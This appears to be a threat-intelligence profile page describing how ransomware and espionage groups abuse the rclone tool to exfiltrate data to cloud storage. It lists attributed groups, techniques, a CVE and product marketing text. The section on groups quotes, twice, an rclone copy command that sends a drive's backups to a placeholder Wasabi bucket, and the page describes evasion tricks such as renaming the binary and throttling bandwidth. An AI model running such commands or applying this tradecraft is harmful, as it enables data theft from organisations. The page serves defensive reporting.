rclone
Rclone is a legitimate open-source command-line cloud synchronization and file transfer tool that is frequently abused by threat actors for data exfiltration. Across the provided reporting, it is repeatedly described as a dominant or common exfiltration utility used to transfer stolen data from internal systems to external cloud storage services including Wasabi, MEGA, Dropbox, Google Drive, Amazon S3, OneDrive, SharePoint, and MegaSync. Threat actors often rename or disguise the binary to evade detection, with examples including crowdstrike.exe and TrendFileSecurityCheck.exe.
Observed behavior in the content includes copying data from local servers and network shares to attacker-controlled cloud buckets, using file-type exclusions or include filters to target business-relevant documents while reducing transfer size and detection risk, and leveraging OAuth-based access to Microsoft 365 services for SharePoint and OneDrive exfiltration. In one reported case, a recovered rclone configuration contained OAuth 2.0 access and refresh tokens with scopes such as Files.ReadWrite.All and Sites.Read.All. The tool was also used in conjunction with other intrusion tooling such as SystemBC, Cobalt Strike, BloodHound, Qakbot, WinRM, and commercial remote management software.
The content links Rclone use to multiple ransomware and intrusion clusters, including LockBit, BlackCat/ALPHV affiliates, Akira affiliates, Medusa/Storm-1175 activity, RansomHub, Hunters International, Medusa Group, and UNC2447, as well as Iranian state-linked MuddyWater/Seedworm operations. It is also described in espionage activity such as Operation CamelClone, where a portable Rclone v1.70.3 build was downloaded and used to upload desktop documents and Telegram Desktop session data to attacker-controlled MEGA accounts. Reported victim sectors and targets associated with incidents involving Rclone include healthcare, finance, education, professional services, transportation, defense, aerospace, government, telecommunications, non-profits, and managed environments.
High-confidence examples from the content include exfiltration of approximately 1 TB of data within 24 hours in the Capita intrusion using SystemBC and Rclone; exfiltration to Wasabi in MuddyWater/Seedworm-related reporting; use by Microsoft-observed actors following Teams/Quick Assist social engineering to move data from internal network locations to external cloud storage; use by Akira affiliates to exfiltrate data to Wasabi after renaming the binary; and use in enterprise ransomware operations where Rclone was staged on domain controllers or administrator workstations because those systems often had permissive outbound access. The content consistently characterizes Rclone as an exfiltration utility rather than a destructive payload.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2023-22515 is a critical Broken Access Control vulnerability affecting certain versions of Atlassian Confluence Data Center and Server. Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian released a patch on October 4, 2023, and confirmed that threat actors exploited CVE-2023-22515 as a zero-day. | CISA, FBI, and MS-ISAC are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts.
Groups observed using it
11 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Эксфильтрация данных - через Rclone в Wasabi cloud storage: Bash: rclone copy CSIDL_DRIVE_FIXED \ backups wasabi: [ BUCKET ] :/192.168.0.x
Эксфильтрация данных - через Rclone в Wasabi cloud storage: Bash: rclone copy CSIDL_DRIVE_FIXED \ backups wasabi: [ BUCKET ] :/192.168.0.x
Using the ‘Rclone’ tool, the threat actor exfiltrated a high volume of data from local servers to a cloud file storage service called ‘Wasabi’.
To that aim, Storm-1175 often uses Bandizip to collect files and Rclone for data exfiltration.
Data exfiltration from the on-premises environment is accomplished by using Rclone to transfer the data to the MegaSync public cloud storage service.
"Additional Resources ... Rclone"; "Exfiltration Over C2 Channel (performed by SystemBC and Rclone)"
"...data exfiltration conducted through 'WinSCP' ... or a hidden or renamed version of 'Rclone.'"
...UNC2447 has been observed using the following tools: ... RCLONE ...
Techniques & procedures
19 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniquesPhantomCore buys commercial software XenArmor All‑In‑One Password Recovery Pro and uploads the free utilities MeshAgent, RSocx, and Rclone
PhantomCore uploads MeshAgent and RSocx to directories on compromised legitimate sites and phishing sites, and uploads XenArmor All‑In‑One Password Recovery Pro and RClone to VPS servers
Initial Access
1 techniqueRclone... used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. | An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited.
Execution
1 techniqueA predominant method observed involves the use of cURL... Threat actors were observed using Rclone to either upload a configuration file to victim infrastructure or enter cloud storage credentials via the command line. | Threat actors were observed using Rclone to either upload a configuration file to victim infrastructure or enter cloud storage credentials via the command line.
Persistence
1 techniqueRclone... used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. | An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited.
Stealth
1 techniquethe threat actor created a malicious file named ‘C:\Intel\svchost.exe’... attempting to mask the malware as benign activity... Additional executions of the Stowaway tunneling tool were also observed during this phase using the names ‘svchost.exe’, ‘tomcat.exe’, and ‘tomcat7.exe’.
Collection
6 techniquesRclone was leveraged to exfiltrate data stored on a D drive on one of the compromised hosts.
T1039 Data from Network Shared Drive The BianLian gang focuses on data exfiltration, collecting data from network drives.
data transfer utilities such as Rclone were used to expand access across the enterprise environment and stage business-relevant information for transfer to external cloud storage.
PhantomCore automates collection of files and authentication data stored in local repositories and databases of infected hosts using PhantomStealer, XenArmor All‑In‑One Password Recovery, and Rclone
During the next three days, the threat actor attempted to exfiltrate data from several different hosts by utilizing Rclone... In some executions of the tool, the threat actor utilized a filter file, to control the file types to be exfiltrated.
PhantomCore archives the authentication data and files found in local repositories and databases of infected hosts using PhantomStealer and Rclone
Command and Control
1 techniqueThreat actors were observed using Rclone to either upload a configuration file to victim infrastructure or enter cloud storage credentials via the command line.
Exfiltration
6 techniquesData exfiltrated via Rclone was throttled by specifying bandwidth transfer limits.
The data was exfiltrated over a 90-minute period, likely via the StealBit tool, prior to execution of the ransomware.
Once they've got access to the victim's device, they minimally escalate privileges and quickly pivot to data exfiltration without encryption, using Windows Secure Copy (WinSCP) or a hidden or renamed version of 'Rclone'.
T1537 Transfer Data to Cloud Account BianLian affiliates used Rclone to exfiltrate data to a cloud account they control to avoid typical file transfers/downloads and network-based exfiltration detection.
Post-exploitation exfiltration of data can be executed through of a variety of techniques. A predominant method observed involves the use of cURL... An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. | An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited.
An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. | Threat actors were observed using Rclone to either upload a configuration file to victim infrastructure or enter cloud storage credentials via the command line.
Impact
1 techniquedata is both exfiltrated and encrypted in place, allowing them to demand payment for unlocking and the non-release of stolen data
IOCs tracked for this family
16 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
51 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Command-line file synchronization and exfiltration tool used here for data theft to cloud storage.
Rclone was used to access Microsoft 365 resources via OAuth tokens and exfiltrate SharePoint and OneDrive data using API-based access.
A file-synchronization utility used by attackers to stage and exfiltrate business-relevant data from internal network locations to external cloud storage.
Rclone was used for data exfiltration in an Akira intrusion, renamed to crowdstrike.exe as a simple evasion measure.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.